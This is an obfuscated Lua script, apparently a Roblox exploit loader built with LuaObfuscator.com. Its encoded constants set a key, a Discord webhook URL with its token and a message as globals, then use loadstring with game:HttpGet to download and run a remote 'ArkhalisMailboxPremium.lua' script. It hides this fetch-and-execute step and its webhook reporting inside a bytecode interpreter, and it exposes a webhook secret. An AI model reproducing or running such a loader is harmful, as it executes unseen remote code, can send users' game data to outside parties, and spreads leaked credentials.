--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v67=v2(v0(v30,16));if v19 then local v77=v5(v67,v19);v19=nil;return v77;else return v67;end end end);local function v20(v31,v32,v33)if v33 then local v68=(v31/((5 -3)^(v32-(2 -1))))%((3 -1)^(((v33-((879 -(282 + 595)) -1)) -(v32-((2257 -(1523 + 114)) -(555 + 64)))) + (932 -(857 + 74)))) ;return v68-(v68%(569 -(367 + 201))) ;else local v69=2^(v32-((834 + 94) -((304 -90) + 713))) ;return (((v31%(v69 + v69))>=v69) and (1 + 0)) or ((1065 -(68 + 997)) + 0) ;end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35,v36=v1(v16,v18,v18 + (8 -6) );v18=v18 + (119 -(32 + 85)) ;return (v36 * (1526 -(226 + 1044))) + v35 ;end local function v23()local v37,v38,v39,v40=v1(v16,v18,v18 + 1 + 2 );v18=v18 + (6 -2) ;return (v40 * (16778173 -(892 + 65))) + (v39 * (65886 -((267 -(67 + 113)) + 263))) + (v38 * 256) + v37 ;end local function v24()local v41=v23();local v42=v23();local v43=1 + 0 ;local v44=(v20(v42,2 -1 ,15 + 5 ) * ((7 -5)^(984 -((2927 -2125) + 150)))) + v41 ;local v45=v20(v42,(198 -142) -(894 -(814 + 45)) ,119 -88 );local v46=((v20(v42,57 -25 )==(1 + 0)) and  -1) or (3 -2) ;if (v45==((0 -0) + 0)) then if (v44==(0 -0)) then return v46 * (438 -(145 + 172 + 121)) ;else local v78=997 -(915 + 82) ;while true do if (v78==(0 -0)) then v45=1 + 0 ;v43=0 -0 ;break;end end end elseif (v45==2047) then return ((v44==(1187 -(1069 + 118))) and (v46 * (((1 + 1) -1)/(0 -0)))) or (v46 * NaN) ;end return v8(v46,v45-(178 + 845) ) * (v43 + (v44/(2^(216 -164)))) ;end local function v25(v47)local v48;if  not v47 then v47=v23();if (v47==0) then return "";end end v48=v3(v16,v18,(v18 + v47) -(1 + 0) );v18=v18 + v47 ;local v49={};for v65=886 -(261 + 624) , #v48 do v49[v65]=v2(v1(v3(v48,v65,v65)));end return v6(v49);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v50=0;local v51;local v52;local v53;local v54;local v55;local v56;local v57;while true do if (v50==0) then local v70=0;local v71;while true do if (v70==0) then v71=0 -0 ;while true do if (v71==(1275 -(388 + 886))) then v50=1 -0 ;break;end if (v71==(238 -(64 + 174))) then local v103=0 + 0 ;while true do if (v103==(560 -(306 + 254))) then v51=0 + 0 ;v52=nil;v103=1;end if (v103==(1 + 0)) then v71=1;break;end end end end break;end end end if (v50~=(5 -2)) then else v57=nil;while true do local v79=1467 -(899 + 568) ;local v80;local v81;while true do if (v79~=(337 -(144 + 192))) then else while true do if (v80~=(0 + 0)) then else v81=0 + 0 ;while true do if (v81==(2 -1)) then if (v51~=(606 -(268 + 335))) then else local v141=290 -(60 + 230) ;local v142;while true do if (v141==(572 -(426 + 146))) then v142=1580 -(1183 + 397) ;while true do if (v142~=0) then else for v152=1,v23() do v53[v152-(2 -1) ]=v28();end return v55;end end break;end end end if (v51~=2) then else local v143=0 + 0 ;local v144;while true do if ((1456 -(282 + 1174))~=v143) then else v144=811 -(569 + 242) ;while true do if ((0 -0)==v144) then local v150=1975 -(1913 + 62) ;while true do if (v150==(0 + 0)) then for v162=1,v56 do local v163=0 -0 ;local v164;local v165;local v166;local v167;local v168;while true do if (v163==(1026 -(706 + 318))) then v168=nil;while true do if (v164==(3 -2)) then local v170=0;while true do if (v170==(1252 -(721 + 530))) then v164=1273 -(945 + 326) ;break;end if (v170~=0) then else v167=nil;v168=nil;v170=2 -1 ;end end end if (v164==0) then v165=0;v166=nil;v164=1 + 0 ;end if (v164==(702 -(271 + 429))) then while true do if (v165~=0) then else v166=0 + 0 ;v167=nil;v165=1501 -(1408 + 92) ;end if ((857 -(564 + 292))==v165) then v168=nil;while true do if (v166~=(1087 -(461 + 625))) then else if (v167==(1289 -(993 + 295))) then v168=v21()~=(304 -(244 + 60)) ;elseif (v167==(1 + 1)) then v168=v24();elseif (v167==(1174 -(418 + 753))) then v168=v25();end v57[v162]=v168;break;end if (v166==0) then local v181=0 + 0 ;local v182;while true do if (v181~=0) then else v182=0;while true do if (v182~=(1002 -(938 + 63))) then else v166=1 + 0 ;break;end if ((0 + 0)~=v182) then else local v189=0 + 0 ;local v190;while true do if ((529 -(406 + 123))==v189) then v190=1769 -(1749 + 20) ;while true do if (v190~=(0 + 0)) then else local v196=1322 -(1249 + 73) ;while true do if (v196~=(0 + 0)) then else v167=v21();v168=nil;v196=1614 -(1565 + 48) ;end if (v196==(1146 -(466 + 679))) then v190=1 + 0 ;break;end end end if (v190~=(2 -1)) then else v182=2 -1 ;break;end end break;end end end end break;end end end end break;end end break;end end break;end if (v163==(268 -(176 + 91))) then v166=nil;v167=nil;v163=2;end if (v163~=(1900 -(106 + 1794))) then else v164=0;v165=nil;v163=1;end end end v55[1 + 2 ]=v21();v150=1 + 0 ;end if (v150~=(1093 -(975 + 117))) then else v144=2 -1 ;break;end end end if (v144~=(2 -1)) then else for v154=115 -(4 + 110) ,v23() do local v155=0 + 0 ;local v156;local v157;local v158;while true do if (v155==(585 -(57 + 527))) then v158=nil;while true do if (v156==(0 -0)) then local v169=1427 -(41 + 1386) ;while true do if (v169~=(103 -(17 + 86))) then else v157=0 + 0 ;v158=nil;v169=1 -0 ;end if ((2 -1)~=v169) then else v156=167 -(122 + 44) ;break;end end end if (v156~=1) then else while true do if (v157==(0 -0)) then v158=v21();if (v20(v158,1,3 -2 )==(0 + 0)) then local v171=0 -0 ;local v172;local v173;local v174;while true do if (v171==(0 -0)) then local v175=0 + 0 ;while true do if (v175~=1) then else v171=1 -0 ;break;end if ((0 + 0)==v175) then v172=v20(v158,1229 -(322 + 905) ,5 -2 );v173=v20(v158,4,6);v175=66 -(30 + 35) ;end end end if (v171==(1192 -(449 + 740))) then if (v20(v173,3,3 + 0 )~=(1258 -(1043 + 214))) then else v174[15 -11 ]=v57[v174[2 + 2 ]];end v52[v154]=v174;break;end if (v171~=1) then else local v177=1212 -(323 + 889) ;local v178;while true do if (v177==0) then v178=0;while true do if ((2 -1)==v178) then v171=582 -(361 + 219) ;break;end if (v178~=(320 -(53 + 267))) then else v174={v22(),v22(),nil,nil};if (v172==0) then local v191=0;local v192;local v193;while true do if (v191~=(414 -(15 + 398))) then else while true do if (v192~=0) then else v193=0 -0 ;while true do if (v193~=(982 -(18 + 964))) then else v174[11 -8 ]=v22();v174[3 + 1 ]=v22();break;end end break;end end break;end if (v191~=(0 + 0)) then else v192=0 -0 ;v193=nil;v191=851 -(20 + 830) ;end end elseif (v172==(1 + 0)) then v174[3]=v23();elseif (v172==(128 -(116 + 10))) then v174[1693 -(1121 + 569) ]=v23() -((216 -(22 + 192))^16) ;elseif (v172~=3) then else local v197=0;local v198;local v199;while true do if (v197==(0 + 0)) then v198=0;v199=nil;v197=739 -(542 + 196) ;end if (v197~=(1464 -(1404 + 59))) then else while true do if (v198==(0 -0)) then v199=0;while true do if ((0 + 0)~=v199) then else v174[3]=v23() -(2^(9 + 7)) ;v174[566 -(334 + 228) ]=v22();break;end end break;end end break;end end end v178=1 + 0 ;end end break;end end end if (v171==(4 -2)) then local v179=0 -0 ;while true do if (v179==(0 -0)) then if (v20(v173,1552 -(1126 + 425) ,1)==(406 -(118 + 287))) then v174[1 + 1 ]=v57[v174[238 -(141 + 95) ]];end if (v20(v173,2,7 -5 )~=(1122 -(118 + 1003))) then else v174[3 + 0 ]=v57[v174[7 -4 ]];end v179=2 -1 ;end if (v179~=(2 -1)) then else v171=380 -(142 + 235) ;break;end end end end end break;end end break;end end break;end if (v155==(0 -0)) then v156=0 -0 ;v157=nil;v155=1 + 0 ;end end end v51=2 + 1 ;break;end end break;end end end break;end if ((0 + 0)==v81) then local v120=0 + 0 ;while true do if (v120==(977 -(553 + 424))) then if (v51==(1 -0)) then local v147=0 + 0 ;while true do if (v147==(0 + 0)) then local v151=0 + 0 ;while true do if (v151==0) then v55={v52,v53,nil,v54};v56=v23();v151=127 -(55 + 71) ;end if (v151==1) then v147=2 -1 ;break;end end end if ((2 -1)==v147) then v57={};v51=2;break;end end end if (v51~=(0 -0)) then else local v148=0 -0 ;local v149;while true do if (v148~=(0 + 0)) then else v149=0;while true do if (v149~=0) then else local v160=0 -0 ;local v161;while true do if (v160==(753 -(239 + 514))) then v161=0;while true do if (1==v161) then v149=2 -1 ;break;end if (v161==0) then v52={};v53={};v161=1 + 0 ;end end break;end end end if (v149~=(1330 -(797 + 532))) then else v54={};v51=1;break;end end break;end end end v120=1 -0 ;end if (v120~=(1 + 0)) then else v81=807 -(118 + 688) ;break;end end end end break;end end break;end if (v79==(0 + 0)) then v80=0 -0 ;v81=nil;v79=1;end end end break;end if (v50==(50 -(25 + 23))) then local v72=1202 -(373 + 829) ;while true do if (v72~=0) then else v55=nil;v56=nil;v72=732 -(476 + 255) ;end if (v72==(1131 -(369 + 761))) then v50=2 + 1 ;break;end end end if (v50~=(733 -(16 + 716))) then else local v73=0 -0 ;while true do if (v73==(1 -0)) then v50=3 -1 ;break;end if (v73~=(0 -0)) then else v53=nil;v54=nil;v73=1;end end end end end local function v29(v58,v59,v60)local v61=0;local v62;local v63;local v64;while true do if (v61==1) then v64=v58[3];return function(...)local v82=v62;local v83=v63;local v84=v64;local v85=v27;local v86=1;local v87= -1;local v88={};local v89={...};local v90=v12("#",...) -1 ;local v91={};local v92={};for v96=0,v90 do if (v96>=v84) then v88[v96-v84 ]=v89[v96 + 1 ];else v92[v96]=v89[v96 + 1 ];end end local v93=(v90-v84) + 1 ;local v94;local v95;while true do v94=v82[v86];v95=v94[1];if (v95<=3) then if (v95<=1) then if (v95==0) then local v104=0;local v105;local v106;while true do if (v104==0) then v105=v94[2];v106=v92[v94[3]];v104=1;end if (1==v104) then v92[v105 + 1 ]=v106;v92[v105]=v106[v94[4]];break;end end else local v107=v94[2];local v108,v109=v85(v92[v107](v13(v92,v107 + 1 ,v94[3])));v87=(v109 + v107) -1 ;local v110=0;for v117=v107,v87 do v110=v110 + 1 ;v92[v117]=v108[v110];end end elseif (v95>2) then v92[v94[2]]();else v92[v94[2]]=v94[3];end elseif (v95<=5) then if (v95>4) then v92[v94[2]][v94[3]]=v94[4];else v92[v94[2]]=v60[v94[3]];end elseif (v95<=6) then do return;end elseif (v95>7) then local v121;local v122;v92[v94[2]]=v60[v94[3]];v86=v86 + 1 ;v94=v82[v86];v92[v94[2]][v94[3]]=v94[4];v86=v86 + 1 ;v94=v82[v86];v92[v94[2]]=v60[v94[3]];v86=v86 + 1 ;v94=v82[v86];v92[v94[2]][v94[3]]=v94[4];v86=v86 + 1 ;v94=v82[v86];v92[v94[2]]=v60[v94[3]];v86=v86 + 1 ;v94=v82[v86];v92[v94[2]][v94[3]]=v94[4];v86=v86 + 1 ;v94=v82[v86];v92[v94[2]]=v60[v94[3]];v86=v86 + 1 ;v94=v82[v86];v92[v94[2]]=v60[v94[3]];v86=v86 + 1 ;v94=v82[v86];v122=v94[2];v121=v92[v94[3]];v92[v122 + 1 ]=v121;v92[v122]=v121[v94[4]];v86=v86 + 1 ;v94=v82[v86];v92[v94[2]]=v94[3];else local v134=0;local v135;while true do if (v134==0) then v135=v94[2];v92[v135]=v92[v135](v13(v92,v135 + 1 ,v87));break;end end end v86=v86 + 1 ;end end;end if (0==v61) then v62=v58[1];v63=v58[2];v61=1;end end end return v29(v28(),{},v17)(...);end v15("LOL!0B3O0003023O005F472O033O004B657903153O0041726B68616C69732D50584A4F46544E5856594657030F3O00576562682O6F6B4475616C482O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O3130393439312O3935322O333233303837392F6645796E6C7062304A456162786C61516D53594A7977544A6C426658486E34583330686E4B6555595A6B45742D367467355F39447A5A2O416B564C50316836786F716835030B3O0053656E644D652O73616765030F3O0041726B68616C69732062652O746572030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403383O00682O7470733A2O2F61726B68616C69736C75612E6769746875622E696F2F41726B68616C69734D61696C626F785072656D69756D2E6C7561000E3O0012083O00013O00304O0002000300124O00013O00304O0004000500124O00013O00304O0006000700124O00083O00122O000100093O00202O00010001000A00122O0003000B4O0001000100034O00075O00022O00033O000100012O00063O00017O00",v9(),...);end